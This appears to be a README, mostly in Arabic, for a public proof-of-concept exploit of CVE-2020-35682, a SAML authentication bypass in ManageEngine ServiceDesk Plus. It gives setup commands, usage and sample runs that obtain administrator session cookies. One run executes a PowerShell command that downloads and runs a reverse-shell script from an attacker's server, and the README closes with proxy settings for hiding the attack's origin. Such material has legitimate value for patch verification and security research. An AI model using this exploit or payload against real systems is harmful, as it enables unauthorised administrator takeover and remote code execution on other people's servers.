
استغلال إثبات المفهوم لـ CVE-2020-35682: تجاوز مصادقة SAML في ManageEngine ServiceDesk Plus، ما يتيح تصعيد الامتيازات إلى مسؤول وتنفيذ التعليمات البرمجية عن بُعد.
SD-91948: CVE-2020-35682: ثغرة التجاوز في المصادقة أثناء تسجيل الدخول عبر SAML في ServiceDesk Plus. (كما هو موصوف من قبل ManageEngine). إذا كان تثبيت ServiceDesk Plus (<11134) في الهدف يحتوي على تسجيل الدخول عبر SAML مفعّلاً وكانت لديك بيانات اعتماد لمستخدم ذي صلاحيات منخفضة، فيمكنك التصعيد إلى مسؤول (administrator) والحصول على RCE.
قررت إصدار هذا الـ POC نظرًا لعدم وجود أي استغلال عام أو وصف كافٍ لاستغلال هذه الثغرة. الكود فوضوي بعض الشيء ولكنه يعمل.
git clone https://github.com/its-arun/CVE-2020-35682.git
cd CVE-2020-35682
pip3 install -r requirements.txt
chmod +x exploit.py
┌─[✗]─[felli0t@damnlab]─[~/POCs/CVE-2020-35682]
└──╼ $./exploit.py -h
usage: exploit.py [-h] -u URL -e EMAIL -p PASSWORD -d DOMAIN [-x PAYLOAD] [-a ADMINUSERNAME]
CVE-2020-35682 : Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus
optional arguments:
-h, --help show this help message and exit
-x PAYLOAD, --payload PAYLOAD
Payload to execute on target, eg: "powershell iex(iwr http://192.168.2.10:8080/reverseshell.ps1
-usebasicparsing)"
-a ADMINUSERNAME, --adminusername ADMINUSERNAME
Admin Username, default: administrator
required named arguments:
-u URL, --url URL ServiceDesk Plus installation url, eg. https://tenet.local/sdp
-e EMAIL, --email EMAIL
User E-mail for SAML Login, eg: [email protected]
-p PASSWORD, --password PASSWORD
User Password for SAML Login
-d DOMAIN, --domain DOMAIN
Domain, eg: TENET
┌─[felli0t@damnlab]─[~/POCs/CVE-2020-35682]
└──╼ $./exploit.py -u "https://tenet.local/sdp" -e '[email protected]' -p 'P@ssw0rd' -d "TENET"
[+] Created session as administrator.
[+] Use following cookies to login as administrator
=[COOKIE NAME]= =[COOKIE VALUE]=
JSESSIONIDSSO E1D80C738E12085360A789109D43A233
PORTALID 1
SDPSESSIONID 918B7C63186055F72EAD2DEAC34B4CA9
┌─[felli0t@damnlab]─[~/POCs/CVE-2020-35682]
└──╼ $./exploit.py -u "https://tenet.local/sdp" -e '[email protected]' -p 'P@ssw0rd' -d "TENET" -x "powershell iex(iwr http://192.168.2.10:8080/reverseshell.ps1 -usebasicparsing)"
[+] Created session as administrator.
[+] Use following cookies to login as administrator
=[COOKIE NAME]= =[COOKIE VALUE]=
JSESSIONIDSSO 2316433DF39DFFE8ACD4E1DDD759D259
PORTALID 1
SDPSESSIONID 666788540DB6329CB7E59E1E96FF30EB
[+] Created custom trigger ADQRYN11WA6KEXIQ
[+] Created Request to trigger custom action ADQRYN11WA6KEXIQ
[+] Executed "powershell iex(iwr http://192.168.2.10:8080/reverseshell.ps1 -usebasicparsing)" on "https://tenet.local/sdp"
[+] Deleted Request ADQRYN11WA6KEXIQ
[+] Deleted Custom Action ADQRYN11WA6KEXIQ
يمكن تعريف البروكسيات في السطر 9 في ملف exploit.py بالتنسيق التالي
proxies = {'http': 'socks4://127.0.0.1:9050','https': 'socks4://127.0.0.1:9050'}
أو يمكنك تعيين البروكسي كمتغير بيئة إذا كنت لا ترغب في تعديل المصدر
export HTTP_PROXY="socks4://127.0.0.1:9050"
export HTTPS_PROXY="socks4://127.0.0.1:9050"
تأكد من إلغاء تعيين هذه المتغيرات بعد تشغيل الأداة.
unset HTTP_PROXY HTTPS_PROXY